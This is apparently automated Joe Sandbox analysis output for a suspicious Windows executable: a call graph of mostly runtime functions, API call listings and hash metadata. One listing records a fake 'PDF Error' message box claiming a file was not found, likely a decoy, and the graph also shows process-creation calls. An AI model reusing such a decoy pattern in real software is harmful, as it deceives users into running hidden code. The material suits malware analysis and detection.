fe5d4b __freea 14 API calls 8725->8732 8772 fe6166 8726->8772 8730 fe60ae 8727->8730 8731 fe60bd 8727->8731 8728->8725 8835 fe5726 8728->8835 8734 fe5d4b __freea 14 API calls 8730->8734 8735 fe5726 ___std_exception_copy 29 API calls 8731->8735 8732->8736 8733 fe6080 8738 fe5d4b __freea 14 API calls 8733->8738 8734->8733 8739 fe60c8 8735->8739 8738->8736 8741 fe6159 8739->8741 8743 fe5d38 __dosmaperr 14 API calls 8739->8743 8742 fe5c67 ___std_exception_copy 11 API calls 8741->8742 8745 fe6165 8742->8745 8750 fe60e0 8743->8750 8747 fe5726 ___std_exception_copy 29 API calls 8747->8750 8748 fe5d4b __freea 14 API calls 8748->8717 8749 fe6ab3 72 API calls 8749->8750 8750->8741 8750->8747 8750->8749 8751 fe612a 8750->8751 8752 fe6114 8750->8752 8753 fe5d38 __dosmaperr 14 API calls 8751->8753 8754 fe5d4b __freea 14 API calls 8752->8754 8755 fe612f 8753->8755 8754->8725 8756 fe6166 81 API calls 8755->8756 8757 fe6143 8756->8757 8758 fe5d4b __freea 14 API calls 8757->8758 8758->8733 8760 fe6acf 8759->8760 8761 fe6ac1 8759->8761 8879 fe69fc 8760->8879 8853 fe67ed 8761->8853 8768 fe67ed 31 API calls 8769 fe6afd 8768->8769 8770 fe6b1f 8769->8770 8771 fe5d4b __freea 14 API calls 8769->8771 8770->8722 8771->8770 8773 fe6189 8772->8773 8774 fe6174 8772->8774 8773->8774 8777 fe619f 8773->8777 8778 fe6195 8773->8778 8775 fe5d38 __dosmaperr 14 API calls 8774->8775 8776 fe6179 8775->8776 8779 fe5c57 ___std_exception_copy 29 API calls 8776->8779 8782 fe61dd 8777->8782 8783 fe61c6 8777->8783 8780 fe5d25 __dosmaperr 14 API calls 8778->8780 8781 fe6184 8779->8781 8780->8774 8781->8733 8992 fe64a8 8782->8992 8784 fe5d4b __freea 14 API calls 8783->8784 8786 fe61ce 8784->8786 8788 fe5d4b __freea 14 API calls 8786->8788 8834 fe61d9 8788->8834 8789 fe61ff 8791 fe5d4b __freea 14 API calls 8789->8791 8790 fe6227 8792 fe5d25 __dosmaperr 14 API calls 8790->8792 8793 fe6207 8791->8793 8794 fe6238 __FrameHandler3::FrameUnwindToState 8792->8794 8795 fe5d4b __freea 14 API calls 8793->8795 8995 feacfd 8794->8995 8796 fe6212 8795->8796 8797 fe5d4b __freea 14 API calls 8796->8797 8797->8834 8800 fe62cf GetLastError 8801 fe5cde __dosmaperr 14 API calls 8800->8801 8804 fe62db 8801->8804 8802 fe636a 8807 fe5019 __FrameHandler3::FrameUnwindToState 21 API calls 8802->8807 8803 fe6291 8805 fe62f4 8803->8805 8806 fe6295 WaitForSingleObject GetExitCodeProcess 8803->8806 8809 fe62e7 8804->8809 8810 fe62e0 CloseHandle 8804->8810 8811 fe62f9 8805->8811 8812 fe6335 8805->8812 8806->8800 8813 fe62ae 8806->8813 8808 fe6371 8807->8808 8816 fe62eb CloseHandle 8809->8816 8817 fe62ca 8809->8817 8810->8809 8818 fe62fd CloseHandle 8811->8818 8819 fe6304 8811->8819 8814 fe6339 CloseHandle 8812->8814 8815 fe6340 8812->8815 8820 fe62bf 8813->8820 8821 fe62b8 CloseHandle 8813->8821 8814->8815 8822 fe5d4b __freea 14 API calls 8815->8822 8816->8817 8824 fe5d4b __freea 14 API calls 8817->8824 8818->8819 8819->8817 8823 fe6308 CloseHandle 8819->8823 8820->8817 8825 fe62c3 CloseHandle 8820->8825 8821->8820 8826 fe6348 8822->8826 8823->8817 8827 fe6319 8824->8827 8825->8817 8828 fe5d4b __freea 14 API calls 8826->8828 8829 fe5d4b __freea 14 API calls 8827->8829 8831 fe6354 8828->8831 8830 fe6325 8829->8830 8832 fe5d4b __freea 14 API calls 8830->8832 8833 fe5d4b __freea 14 API calls 8831->8833 8832->8834 8833->8834 8834->8733 8836 fe5734 8835->8836 8837 fe5742 8835->8837 8836->8837 8839 fe575a 8836->8839 8838 fe5d38 __dosmaperr 14 API calls 8837->8838 8843 fe574a 8838->8843 8841 fe5754 8839->8841 8842 fe5d38 __dosmaperr 14 API calls 8839->8842 8840 fe5c57 ___std_exception_copy 29 API calls 8840->8841 8841->8741 8844 fea875 8841->8844 8842->8843 8843->8840 8846 fea891 8844->8846 8849 fea883 8844->8849 8845 fe5d38 __dosmaperr 14 API calls 8847 fea899 8845->8847 8846->8845 8848 fe5c57 ___std_exception_copy 29 API calls 8847->8848 8850 fe6028 8848->8850 8849->8846 8851 fea8b8 8849->8851 8850->8741 8850->8748 8851->8850 8852 fe5d38 __dosmaperr 14 API calls 8851->8852 8852->8847 8854 fe6807 8853->8854 8855 fe6822 8853->8855 8858 fe5d25 __dosmaperr 14 API calls 8854->8858 8856 fe682e 8855->8856 8857 fe6849 GetFileAttributesExW 8855->8857 8859 fe5d25 __dosmaperr 14 API calls 8856->8859 8860 fe685a GetLastError 8857->8860 8868 fe6869 8857->8868 8861 fe680c 8858->8861 8862 fe6833 8859->8862 8887 fe5cde 8860->8887 8864 fe5d38 __dosmaperr 14 API calls 8861->8864 8866 fe5d38 __dosmaperr 14 API calls 8862->8866 8865 fe6814 8864->8865 8867 fe5c57 ___std_exception_copy 29 API calls 8865->8867 8869 fe683b 8866->8869 8870 fe681e 8867->8870 8868->8870 8871 fe5d25 __dosmaperr 14 API calls 8868->8871 8873 fe5c57 ___std_exception_copy 29 API calls 8869->8873 8874 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 8870->8874 8875 fe6881 8871->8875 8872 fe5d38 __dosmaperr 14 API calls 8872->8870 8873->8870 8876 fe68a9 8874->8876 8877 fe5d38 __dosmaperr 14 API calls 8875->8877 8876->8722 8878 fe6866 8877->8878 8878->8872 8892 fe697a 8879->8892 8882 fe6a20 8884 fe695d 8882->8884 8957 fe68ab 8884->8957 8888 fe5d25 __dosmaperr 14 API calls 8887->8888 8889 fe5ce9 __dosmaperr 8888->8889 8890 fe5d38 __dosmaperr 14 API calls 8889->8890 8891 fe5cfc 8890->8891 8891->8878 8893 fe6998 8892->8893 8899 fe6991 8892->8899 8894 fe6e63 _unexpected 68 API calls 8893->8894 8893->8899 8895 fe69b9 8894->8895 8903 fea56e 8895->8903 8899->8882 8900 fe95e2 8899->8900 8954 fe93ea 8900->8954 8904 fe69cf 8903->8904 8905 fea581 8903->8905 8907 fea5cc 8904->8907 8905->8904 8911 fe9319 8905->8911 8908 fea5df 8907->8908 8909 fea5f4 8907->8909 8908->8909 8933 fe7d81 8908->8933 8909->8899 8912 fe9325 ___scrt_is_nonwritable_in_current_image 8911->8912 8913 fe6e63 _unexpected 68 API calls 8912->8913 8914 fe932e 8913->8914 8915 fe9374 8914->8915 8924 fe86e1 EnterCriticalSection 8914->8924 8915->8904 8917 fe934c 8925 fe939a 8917->8925 8922 fe5780 __FrameHandler3::FrameUnwindToState 68 API calls 8923 fe9399 8922->8923 8924->8917 8926 fe93a8 _unexpected 8925->8926 8928 fe935d 8925->8928 8927 fe90cd _unexpected 14 API calls 8926->8927 8926->8928 8927->8928 8929 fe9379 8928->8929 8932 fe8729 LeaveCriticalSection 8929->8932 8931 fe9370 8931->8915 8931->8922 8932->8931 8934 fe6e63 _unexpected 68 API calls 8933->8934 8935 fe7d86 8934->8935 8938 fe7c99 8935->8938 8939 fe7ca5 ___scrt_is_nonwritable_in_current_image 8938->8939 8940 fe7cbf 8939->8940 8949 fe86e1 EnterCriticalSection 8939->8949 8942 fe7cc6 8940->8942 8945 fe5780 __FrameHandler3::FrameUnwindToState 68 API calls 8940->8945 8942->8909 8943 fe7cfb 8950 fe7d18 8943->8950 8946 fe7d38 8945->8946 8947 fe7ccf 8947->8943 8948 fe5d4b __freea 14 API calls 8947->8948 8948->8943 8949->8947 8953 fe8729 LeaveCriticalSection 8950->8953 8952 fe7d1f 8952->8940 8953->8952 8955 fe951d _unexpected 5 API calls 8954->8955 8956 fe9400 8955->8956 8956->8882 8958 fe68b9 8957->8958 8959 fe68d3 8957->8959 8975 fe6a3b 8958->8975 8961 fe68da 8959->8961 8962 fe68f9 8959->8962 8967 fe68c3 8961->8967 8979 fe6a55 8961->8979 8984 fe80cb 8962->8984 8964 fe6908 8966 fe690f GetLastError 8964->8966 8969 fe6935 8964->8969 8971 fe6a55 15 API calls 8964->8971 8968 fe5cde __dosmaperr 14 API calls 8966->8968 8967->8768 8967->8769 8970 fe691b 8968->8970 8969->8967 8972 fe80cb __FrameHandler3::FrameUnwindToState MultiByteToWideChar 8969->8972 8973 fe5d38 __dosmaperr 14 API calls 8970->8973 8971->8969 8974 fe694c 8972->8974 8973->8967 8974->8966 8974->8967 8976 fe6a46 8975->8976 8977 fe6a4e 8975->8977 8978 fe5d4b __freea 14 API calls 8976->8978 8977->8967 8978->8977 8980 fe6a3b 14 API calls 8979->8980 8981 fe6a63 8980->8981 8987 fe6a94 8981->8987 8990 fe8033 8984->8990 8988 fe8e93 15 API calls 8987->8988 8989 fe6a74 8988->8989 8989->8967 8991 fe8044 MultiByteToWideChar 8990->8991 8991->8964 9016 fe5f18 8992->9016 8996 fe69fc 68 API calls 8995->8996 8997 fead46 8996->8997 8998 fe695d 17 API calls 8997->8998 8999 fead53 8998->8999 9000 feadba 8999->9000 9002 fe69fc 68 API calls 8999->9002 9001 feadc6 9000->9001 9003 fe5d4b __freea 14 API calls 9000->9003 9005 fe5d4b __freea 14 API calls 9001->9005 9008 feadd5 9001->9008 9004 fead5f 9002->9004 9003->9001 9006 fe695d 17 API calls 9004->9006 9005->9008 9009 fead6c 9006->9009 9007 fe6278 9007->8800 9007->8802 9007->8803 9008->9007 9010 fe5d4b __freea 14 API calls 9008->9010 9009->9000 9011 fead96 CreateProcessW 9009->9011 9012 fe69fc 68 API calls 9009->9012 9010->9007 9011->9000 9013 fead7d 9012->9013 9014 fe695d 17 API calls 9013->9014 9015 fead8a 9014->9015 9015->9000 9015->9011 9017 fe5f24 ___scrt_is_nonwritable_in_current_image 9016->9017 9024 fe86e1 EnterCriticalSection 9017->9024 9019 fe5f32 9025 fe6372 9019->9025 9024->9019 9026 fe639b 9025->9026 9027 fe63d9 9026->9027 9028 fe63c7 9026->9028 9030 fe728b _unexpected 14 API calls 9027->9030 9029 fe5d38 __dosmaperr 14 API calls 9028->9029 9035 fe5f3f 9029->9035 9031 fe63ed 9030->9031 9032 fe5d38 __dosmaperr 14 API calls 9031->9032 9033 fe63fb 9031->9033 9032->9033 9034 fe5d4b __freea 14 API calls 9033->9034 9034->9035 9036 fe5f67 9035->9036 9039 fe8729 LeaveCriticalSection 9036->9039 9038 fe5f50 9038->8789 9038->8790 9039->9038 9530 fe13b7 9531 fe13bf 9530->9531 9547 fe506b 9531->9547 9533 fe13ca 9554 fe17d3 9533->9554 9535 fe143c 9536 fe1a8e 4 API calls 9535->9536 9546 fe1459 9535->9546 9538 fe1461 9536->9538 9537 fe13df __RTC_Initialize 9537->9535 9560 fe1960 9537->9560 9540 fe13f8 9540->9535 9563 fe1a1a InitializeSListHead 9540->9563 9542 fe140e 9564 fe1a29 9542->9564 9544 fe1431 9570 fe5148 9544->9570 9548 fe509d 9547->9548 9549 fe507a 9547->9549 9548->9533 9549->9548 9550 fe5d38 __dosmaperr 14 API calls 9549->9550 9551 fe508d 9550->9551 9552 fe5c57 ___std_exception_copy 29 API calls 9551->9552 9553 fe5098 9552->9553 9553->9533 9555 fe17df 9554->9555 9556 fe17e3 9554->9556 9555->9537 9557 fe1a8e 4 API calls 9556->9557 9559 fe17f0 ___scrt_release_startup_lock 9556->9559 9558 fe1859 9557->9558 9559->9537 9577 fe1933 9560->9577 9563->9542 9640 fe5665 9564->9640 9566 fe1a3a 9567 fe1a41 9566->9567 9568 fe1a8e 4 API calls 9566->9568 9567->9544 9569 fe1a49 9568->9569 9569->9544 9571 fe6e63 _unexpected 68 API calls 9570->9571 9572 fe5153 9571->9572 9573 fe518b 9572->9573 9574 fe5d38 __dosmaperr 14 API calls 9572->9574 9573->9535 9575 fe5180 9574->9575 9576 fe5c57 ___std_exception_copy 29 API calls 9575->9576 9576->9573 9578 fe1949 9577->9578 9579 fe1942 9577->9579 9586 fe54f5 9578->9586 9583 fe5478 9579->9583 9582 fe1947 9582->9540 9584 fe54f5 32 API calls 9583->9584 9585 fe548a 9584->9585 9585->9582 9589 fe5241 9586->9589 9590 fe524d ___scrt_is_nonwritable_in_current_image 9589->9590 9597 fe86e1 EnterCriticalSection 9590->9597 9592 fe525b 9598 fe529c 9592->9598 9594 fe5268 9608 fe5290 9594->9608 9597->9592 9599 fe532a _unexpected 9598->9599 9600 fe52b7 9598->9600 9599->9594 9600->9599 9601 fe530a 9600->9601 9611 fe9880 9600->9611 9601->9599 9603 fe9880 32 API calls 9601->9603 9605 fe5320 9603->9605 9604 fe5300 9606 fe5d4b __freea 14 API calls 9604->9606 9607 fe5d4b __freea 14 API calls 9605->9607 9606->9601 9607->9599 9639 fe8729 LeaveCriticalSection 9608->9639 9610 fe5279 9610->9582 9612 fe988d 9611->9612 9613 fe98a8 9611->9613 9612->9613 9614 fe9899 9612->9614 9615 fe98b7 9613->9615 9620 feb777 9613->9620 9616 fe5d38 __dosmaperr 14 API calls 9614->9616 9627 feb7aa 9615->9627 9619 fe989e __FrameHandler3::FrameUnwindToState 9616->9619 9619->9604 9621 feb797 HeapSize 9620->9621 9622 feb782 9620->9622 9621->9615 9623 fe5d38 __dosmaperr 14 API calls 9622->9623 9624 feb787 9623->9624 9625 fe5c57 ___std_exception_copy 29 API calls 9624->9625 9626 feb792 9625->9626 9626->9615 9628 feb7b7 9627->9628 9629 feb7c2 9627->9629 9630 fe8e93 15 API calls 9628->9630 9631 feb7ca 9629->9631 9637 feb7d3 _unexpected 9629->9637 9635 feb7bf 9630->9635 9632 fe5d4b __freea 14 API calls 9631->9632 9632->9635 9633 feb7fd HeapReAlloc 9633->9635 9633->9637 9634 feb7d8 9636 fe5d38 __dosmaperr 14 API calls 9634->9636 9635->9619 9636->9635 9637->9633 9637->9634 9638 fe99b0 _unexpected 2 API calls 9637->9638 9638->9637 9639->9610 9641 fe5683 9640->9641 9645 fe56a3 9640->9645 9642 fe5d38 __dosmaperr 14 API calls 9641->9642 9643 fe5699 9642->9643 9644 fe5c57 ___std_exception_copy 29 API calls 9643->9644 9644->9645 9645->9566 9646 fea0b4 9647 fe9fe3 ___scrt_uninitialize_crt 68 API calls 9646->9647 9648 fea0bc 9647->9648 9656 fec401 9648->9656 9650 fea0c1 9666 fec4ac 9650->9666 9653 fea0eb 9654 fe5d4b __freea 14 API calls 9653->9654 9655 fea0f6 9654->9655 9657 fec40d ___scrt_is_nonwritable_in_current_image 9656->9657 9670 fe86e1 EnterCriticalSection 9657->9670 9659 fec484 9675 fec4a3 9659->9675 9661 fec418 9661->9659 9663 fec458 DeleteCriticalSection 9661->9663 9671 fece1b 9661->9671 9665 fe5d4b __freea 14 API calls 9663->9665 9665->9661 9667 fea0d0 DeleteCriticalSection 9666->9667 9668 fec4c3 9666->9668 9667->9650 9667->9653 9668->9667 9669 fe5d4b __freea 14 API calls 9668->9669 9669->9667 9670->9661 9672 fece2e __FrameHandler3::FrameUnwindToState 9671->9672 9678 feccf6 9672->9678 9674 fece3a __FrameHandler3::FrameUnwindToState 9674->9661 9750 fe8729 LeaveCriticalSection 9675->9750 9677 fec490 9677->9650 9679 fecd02 ___scrt_is_nonwritable_in_current_image 9678->9679 9680 fecd0c 9679->9680 9682 fecd2f 9679->9682 9681 fe5bda ___std_exception_copy 29 API calls 9680->9681 9688 fecd27 9681->9688 9682->9688 9689 fea100 EnterCriticalSection 9682->9689 9684 fecd4d 9690 fecd8d 9684->9690 9686 fecd5a 9704 fecd85 9686->9704 9688->9674 9689->9684 9691 fecdbd 9690->9691 9692 fecd9a 9690->9692 9694 fecdb5 9691->9694 9695 fe9f15 __FrameHandler3::FrameUnwindToState 68 API calls 9691->9695 9693 fe5bda ___std_exception_copy 29 API calls 9692->9693 9693->9694 9694->9686 9696 fecdd5 9695->9696 9697 fec4ac 14 API calls 9696->9697 9698 fecddd 9697->9698 9699 fea75d __FrameHandler3::FrameUnwindToState 29 API calls 9698->9699 9700 fecde9 9699->9700 9707 fed60c 9700->9707 9703 fe5d4b __freea 14 API calls 9703->9694 9749 fea114 LeaveCriticalSection 9704->9749 9706 fecd8b 9706->9688 9708 fecdf0 9707->9708 9709 fed635 9707->9709 9708->9694 9708->9703 9710 fed684 9709->9710 9712 fed65c 9709->9712 9711 fe5bda ___std_exception_copy 29 API calls 9710->9711 9711->9708 9714 fed57b 9712->9714 9715 fed587 ___scrt_is_nonwritable_in_current_image 9714->9715 9722 fe88da EnterCriticalSection 9715->9722 9717 fed595 9718 fed5c6 9717->9718 9723 fed6af 9717->9723 9736 fed600 9718->9736 9722->9717 9724 fe89b1 __FrameHandler3::FrameUnwindToState 29 API calls 9723->9724 9727 fed6bf 9724->9727 9725 fed6c5 9739 fe8920 9725->9739 9727->9725 9728 fed6f7 9727->9728 9729 fe89b1 __FrameHandler3::FrameUnwindToState 29 API calls 9727->9729 9728->9725 9730 fe89b1 __FrameHandler3::FrameUnwindToState 29 API calls 9728->9730 9731 fed6ee 9729->9731 9732 fed703 CloseHandle 9730->9732 9733 fe89b1 __FrameHandler3::FrameUnwindToState 29 API calls 9731->9733 9732->9725 9734 fed70f GetLastError 9732->9734 9733->9728 9734->9725 9735 fed71d __FrameHandler3::FrameUnwindToState 9735->9718 9748 fe88fd LeaveCriticalSection 9736->9748 9738 fed5e9 9738->9708 9740 fe8996 9739->9740 9741 fe892f 9739->9741 9742 fe5d38 __dosmaperr 14 API calls 9740->9742 9741->9740 9747 fe8959 9741->9747 9743 fe899b 9742->9743 9744 fe5d25 __dosmaperr 14 API calls 9743->9744 9745 fe8986 9744->9745 9745->9735 9746 fe8980 SetStdHandle 9746->9745 9747->9745 9747->9746 9748->9738 9749->9706 9750->9677 9070 fe4230 9102 fe5efa 9070->9102 9073 fe426b 9075 fe426f 9073->9075 9076 fe42a3 9073->9076 9074 fe4340 9077 fe5c67 ___std_exception_copy 11 API calls 9074->9077 9079 fe4275 9075->9079 9080 fe4282 9075->9080 9078 fe430c 9076->9078 9083 fe5d38 __dosmaperr 14 API calls 9076->9083 9082 fe434a 9077->9082 9089 fe5d4b __freea 14 API calls 9078->9089 9084 fe5d4b __freea 14 API calls 9079->9084 9081 fe6ab3 72 API calls 9080->9081 9085 fe428a 9081->9085 9086 fe42c0 9083->9086 9092 fe427a 9084->9092 9087 fe5d4b __freea 14 API calls 9085->9087 9088 fe5d38 __dosmaperr 14 API calls 9086->9088 9087->9092 9091 fe42c7 9088->9091 9089->9092 9090 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9093 fe433e 9090->9093 9094 fe5d38 __dosmaperr 14 API calls 9091->9094 9092->9090 9095 fe42e1 9094->9095 9096 fe42e6 9095->9096 9097 fe4307 9095->9097 9098 fe5d38 __dosmaperr 14 API calls 9095->9098 9099 fe5d4b __freea 14 API calls 9096->9099 9100 fe5d38 __dosmaperr 14 API calls 9097->9100 9101 fe42f4 9098->9101 9099->9092 9100->9078 9101->9096 9101->9097 9105 fe5d85 9102->9105 9106 fe5d91 ___scrt_is_nonwritable_in_current_image 9105->9106 9113 fe86e1 EnterCriticalSection 9106->9113 9108 fe5d9c 9114 fe5dea 9108->9114 9113->9108 9115 fe5df9 9114->9115 9117 fe5e0c 9114->9117 9116 fe5d38 __dosmaperr 14 API calls 9115->9116 9118 fe5dfe 9116->9118 9117->9115 9119 fe5e1f 9117->9119 9120 fe5c57 ___std_exception_copy 29 API calls 9118->9120 9135 fe5e8d 9119->9135 9122 fe5db8 9120->9122 9132 fe5de1 9122->9132 9123 fe5e28 __FrameHandler3::FrameUnwindToState 9123->9122 9124 fe5e64 9123->9124 9125 fe5e53 9123->9125 9127 fe5726 ___std_exception_copy 29 API calls 9124->9127 9126 fe5d38 __dosmaperr 14 API calls 9125->9126 9126->9122 9128 fe5e6f 9127->9128 9128->9122 9129 fe5e80 9128->9129 9130 fe5c67 ___std_exception_copy 11 API calls 9129->9130 9131 fe5e8c 9130->9131 9173 fe8729 LeaveCriticalSection 9132->9173 9134 fe425b 9134->9073 9134->9074 9137 fe5e9a 9135->9137 9136 fe5eed 9136->9123 9137->9136 9139 fea784 9137->9139 9140 fea798 9139->9140 9141 fea792 9139->9141 9140->9137 9142 fec7f9 9141->9142 9143 fec841 9141->9143 9145 fec7ff 9142->9145 9148 fec81c 9142->9148 9155 fec857 9143->9155 9147 fe5d38 __dosmaperr 14 API calls 9145->9147 9146 fec80f 9146->9137 9149 fec804 9147->9149 9151 fe5d38 __dosmaperr 14 API calls 9148->9151 9154 fec83a 9148->9154 9150 fe5c57 ___std_exception_copy 29 API calls 9149->9150 9150->9146 9152 fec82b 9151->9152 9153 fe5c57 ___std_exception_copy 29 API calls 9152->9153 9153->9146 9154->9137 9156 fec867 9155->9156 9157 fec881 9155->9157 9158 fe5d38 __dosmaperr 14 API calls 9156->9158 9159 fec889 9157->9159 9160 fec8a0 9157->9160 9163 fec86c 9158->9163 9161 fe5d38 __dosmaperr 14 API calls 9159->9161 9162 fec8ac 9160->9162 9166 fec8c3 9160->9166 9164 fec88e 9161->9164 9165 fe5d38 __dosmaperr 14 API calls 9162->9165 9167 fe5c57 ___std_exception_copy 29 API calls 9163->9167 9168 fe5c57 ___std_exception_copy 29 API calls 9164->9168 9169 fec8b1 9165->9169 9170 fe697a 68 API calls 9166->9170 9172 fec877 9166->9172 9167->9172 9168->9172 9171 fe5c57 ___std_exception_copy 29 API calls 9169->9171 9170->9172 9171->9172 9172->9146 9173->9134 10588 fe6d2a 10589 fe6d45 10588->10589 10590 fe6d35 10588->10590 10594 fe6d4b 10590->10594 10593 fe5d4b __freea 14 API calls 10593->10589 10595 fe6d66 10594->10595 10596 fe6d60 10594->10596 10598 fe5d4b __freea 14 API calls 10595->10598 10597 fe5d4b __freea 14 API calls 10596->10597 10597->10595 10599 fe6d72 10598->10599 10600 fe5d4b __freea 14 API calls 10599->10600 10601 fe6d7d 10600->10601 10602 fe5d4b __freea 14 API calls 10601->10602 10603 fe6d88 10602->10603 10604 fe5d4b __freea 14 API calls 10603->10604 10605 fe6d93 10604->10605 10606 fe5d4b __freea 14 API calls 10605->10606 10607 fe6d9e 10606->10607 10608 fe5d4b __freea 14 API calls 10607->10608 10609 fe6da9 10608->10609 10610 fe5d4b __freea 14 API calls 10609->10610 10611 fe6db4 10610->10611 10612 fe5d4b __freea 14 API calls 10611->10612 10613 fe6dbf 10612->10613 10614 fe5d4b __freea 14 API calls 10613->10614 10615 fe6dcd 10614->10615 10620 fe6b77 10615->10620 10621 fe6b83 ___scrt_is_nonwritable_in_current_image 10620->10621 10636 fe86e1 EnterCriticalSection 10621->10636 10623 fe6bb7 10637 fe6bd6 10623->10637 10625 fe6b8d 10625->10623 10627 fe5d4b __freea 14 API calls 10625->10627 10627->10623 10628 fe6be2 10629 fe6bee ___scrt_is_nonwritable_in_current_image 10628->10629 10641 fe86e1 EnterCriticalSection 10629->10641 10631 fe6bf8 10632 fe6e18 _unexpected 14 API calls 10631->10632 10633 fe6c0b 10632->10633 10642 fe6c2b 10633->10642 10636->10625 10640 fe8729 LeaveCriticalSection 10637->10640 10639 fe6bc4 10639->10628 10640->10639 10641->10631 10645 fe8729 LeaveCriticalSection 10642->10645 10644 fe6c19 10644->10593 10645->10644 10646 fe5121 10649 fe50a8 10646->10649 10650 fe50b4 ___scrt_is_nonwritable_in_current_image 10649->10650 10657 fe86e1 EnterCriticalSection 10650->10657 10652 fe50ec 10658 fe510a 10652->10658 10653 fe50be 10653->10652 10656 fe939a __FrameHandler3::FrameUnwindToState 14 API calls 10653->10656 10656->10653 10657->10653 10661 fe8729 LeaveCriticalSection 10658->10661 10660 fe50f8 10661->10660 9040 fe1180 9041 fe129a 9040->9041 9042 fe11a5 9040->9042 9043 fe12ef 9041->9043 9044 fe12a1 9041->9044 9045 fe11ab 9042->9045 9046 fe1231 BeginPaint CreateCompatibleDC SelectObject GetObjectW BitBlt 9042->9046 9049 fe133a DialogBoxParamW 9043->9049 9050 fe12fa 9043->9050 9052 fe12a8 DefWindowProcW 9044->9052 9053 fe12c9 9044->9053 9047 fe11bd CreateWindowExW LoadImageW 9045->9047 9048 fe11b2 9045->9048 9051 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9046->9051 9065 fe11bb 9047->9065 9048->9052 9048->9065 9057 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9049->9057 9054 fe131e DestroyWindow 9050->9054 9055 fe12ff DefWindowProcW 9050->9055 9056 fe1294 9051->9056 9058 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9052->9058 9060 fe12d3 MessageBoxW 9053->9060 9062 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9054->9062 9061 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9055->9061 9063 fe135f 9057->9063 9059 fe12c3 9058->9059 9064 fe1214 PostQuitMessage 9060->9064 9066 fe1318 9061->9066 9067 fe1334 9062->9067 9068 fe13a9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 9064->9068 9065->9064 9069 fe122b 9068->9069

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • LoadStringW.USER32(?,00000067,GtYD2,00000064), ref: 00FE1025
                                                                                                      • LoadStringW.USER32(?,0000006D,GTYD2,00000064), ref: 00FE1031
                                                                                                      • LoadIconW.USER32(?,0000006B), ref: 00FE1062
                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00FE106E
                                                                                                      • LoadIconW.USER32(?,0000006C), ref: 00FE1091
                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00FE109A
                                                                                                      • CreateWindowExW.USER32(00000000,GTYD2,GtYD2,00CF0000,0000012C,000000C8,0000022E,0000014A,00000000,00000000,?,00000000), ref: 00FE10D2
                                                                                                      • ShowWindow.USER32(00000000,00000006), ref: 00FE10F4
                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00FE10FB
                                                                                                      • LoadAcceleratorsW.USER32(?,0000006D), ref: 00FE1104
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 00FE111D
                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00FE113A
                                                                                                      • TranslateMessage.USER32(?), ref: 00FE1148
                                                                                                      • DispatchMessageW.USER32(?), ref: 00FE114E
                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FE115A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1654350112.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1654338710.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654363247.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654375528.0000000000FF7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1654387773.0000000000FF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_fe0000_dGuYmJNS1K.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$Message$CallbackDispatcherIconStringTranslateUserWindow$AcceleratorAcceleratorsClassCreateCursorDispatchRegisterShow
                                                                                                      • String ID: 0$GTYD2$GtYD2$m
                                                                                                      • API String ID: 4247121621-201902267
                                                                                                      • Opcode ID: 3b724e6f086c1f62d0f7e02eeca700373e882e7ae14b40d0b5998ba45ccdf58b
                                                                                                      • Instruction ID: ced68f5090a5a409585e460736a2954aee72008b504a2e9011a36bdb31814949
                                                                                                      • Opcode Fuzzy Hash: 3b724e6f086c1f62d0f7e02eeca700373e882e7ae14b40d0b5998ba45ccdf58b
                                                                                                      • Instruction Fuzzy Hash: A1413A72E4021CABDB109BE19C45FAE7BBDAF08B00F10001AF601BA291DBB56915EB94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateWindowExW.USER32(00000000,Edit,00FF4DA0,50800205,00000020,0000008D,000000C9,00000021,?,00000000,00000000,00000000), ref: 00FE11E3
                                                                                                      • LoadImageW.USER32(00000081,00000000,00000000,00000000,00000000), ref: 00FE11FC
                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00FE1216
                                                                                                      • BeginPaint.USER32(?,?), ref: 00FE1237
                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00FE1240
                                                                                                      • SelectObject.GDI32(00000000), ref: 00FE124F
                                                                                                      • GetObjectW.GDI32(00000018,?), ref: 00FE1262
                                                                                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00FE127F
                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00FE12B0
                                                                                                      • MessageBoxW.USER32(00000000,Archivo no encontrado Error i86wl58,PDF Error i86wl58,00000010), ref: 00FE12E4
                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00FE1305
                                                                                                      • DestroyWindow.USER32(?), ref: 00FE131F
                                                                                                      Strings
